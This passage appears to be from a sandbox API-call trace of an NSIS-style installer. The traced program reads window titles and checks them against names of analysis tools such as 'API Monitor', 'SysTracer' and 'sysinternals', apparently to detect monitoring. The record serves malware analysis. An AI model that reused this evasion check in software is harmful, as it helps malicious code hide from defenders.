lpString1="Task Switching") returned="Task Switching" [0158.468] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.468] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.468] lstrcpynA (in: lpString1=0x340df8, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.468] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.468] strstr (_Str="Task Switching", _SubStr="API Monitor") returned 0x0 [0158.468] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.468] lstrcpynA (in: lpString1=0x341200, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.468] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.468] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.468] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.468] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.469] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.469] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.469] lstrlenA (lpString="0") returned 1 [0158.469] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.469] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.469] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.469] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.469] lstrlenA (lpString="0") returned 1 [0158.469] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.469] lstrlenA (lpString="Task Switching") returned 14 [0158.469] lstrcpynA (in: lpString1=0x33723c, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.469] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.469] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrlenA (lpString="3399936") returned 7 [0158.469] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.469] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.469] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.469] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.469] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrcpynA (in: lpString1=0x337684, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.470] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrlenA (lpString="") returned 0 [0158.470] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.470] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrcpynA (in: lpString1=0x337acc, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.470] lstrcpynA (in: lpString1=0x432c00, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.470] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrlenA (lpString="") returned 0 [0158.470] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrlenA (lpString="") returned 0 [0158.470] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.470] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.470] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.470] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.470] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.470] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.470] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.470] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.471] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.471] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.471] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.471] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.471] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.471] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.471] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.471] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.471] lstrcpynA (in: lpString1=0x341200, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.471] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.471] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.471] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.471] strstr (_Str="Task Switching", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.472] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.472] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.472] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.472] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.472] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.472] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.472] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.472] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.472] lstrlenA (lpString="0") returned 1 [0158.472] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.472] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.472] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.472] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.472] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.472] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.472] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.472] lstrlenA (lpString="0") returned 1 [0158.472] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.472] lstrlenA (lpString="Task Switching") returned 14 [0158.472] lstrcpynA (in: lpString1=0x33723c, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.473] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.473] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.473] lstrlenA (lpString="3399936") returned 7 [0158.473] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.473] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.473] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.473] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.473] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.473] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.473] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.473] lstrcpynA (in: lpString1=0x337684, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.473] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrlenA (lpString="") returned 0 [0158.473] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.473] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrcpynA (in: lpString1=0x337acc, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.473] lstrcpynA (in: lpString1=0x432c00, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.473] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrlenA (lpString="") returned 0 [0158.473] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrlenA (lpString="") returned 0 [0158.473] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.473] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.473] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.474] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.474] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.474] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.474] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.474] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.474] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.474] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.474] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.474] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.474] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.474] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.474] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.475] lstrcpynA (in: lpString1=0x341200, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.475] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.475] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.475] lstrcpynA (in: lpString1=0x340df8, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.475] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.475] strstr (_Str="Task Switching", _SubStr="sysinternals") returned 0x0 [0158.475] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.475] lstrcpynA (in: lpString1=0x341200, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.475] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.475] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.475] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.475] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.475] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.475] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.475] lstrlenA (lpString="0") returned 1 [0158.475] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.475] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.475] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.476] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.476] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.476] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.476] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.476] lstrlenA (lpString="0") returned 1 [0158.476] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.476] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.476] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.476] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.477] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.477] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.477] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.477] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.477] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.477] lstrlenA (lpString="3399936") returned 7 [0158.478] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.478] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.478] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.478] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.478] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.478] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.478] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.478] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.478] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.478] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.478] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65692") returned 5 [0158.478] lstrcpyA (in: lpString1=0x430400, lpString2="65692" | out: lpString1="65692") returned="65692" [0158.478] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.478] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.479] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.479] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.479] lstrlenA (lpString="callback1") returned 9 [0158.479] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.479] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.479] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.479] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.479] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.479] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.479] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.479] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.479] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.479] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.479] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.479] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", 